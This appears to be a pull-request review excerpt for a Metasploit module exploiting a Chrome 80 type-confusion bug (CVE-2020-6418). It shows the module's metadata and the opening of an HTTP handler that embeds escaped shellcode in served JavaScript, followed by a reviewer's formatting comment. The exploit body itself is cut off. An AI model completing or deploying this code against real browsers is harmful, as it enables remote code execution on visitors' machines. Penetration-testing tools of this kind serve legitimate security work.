modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb

```diff
@@ -0,0 +1,370 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 80 JSCreate side-effect type confusion exploit',
+      'Description'    => %q{
+      This module exploits an issue in Chrome 80.0.3987.87 (64 bit) on Windows 10 --no-sandbox.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'saelo', # discovery
+          'István Kurucsai', # exploit
+          'timwr', # metasploit copynpasta
+        ],
+      'References'     => [
+          ['CVE', '2020-6418'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],
+          ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],
+          ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => ['windows','osx'],
+      'DefaultTarget'  => 0,
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Feb 28 2019'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
+  end
+
+  def on_request_uri(cli, request)
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] #{request.body}")
+      send_response(cli, '')
+      return
+    end
+
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    escaped_payload = Rex::Text.to_unescape(payload.raw)
+    jscript = %Q^
+var shellcode = unescape("#{escaped_payload}");
```

Comment:
```suggestion
    jscript = %Q^
      var shellcode = unescape("#{escaped_payload}");
```
Could you tab over the value for `jscript` and all other variables set with `%Q^` like above? Even if it ends up making rubocop scream its way nicer to read

Reply:
Sorry, I'm being silly, just noticed that'd mess up the JS because the tabs get included in the string. Carry on!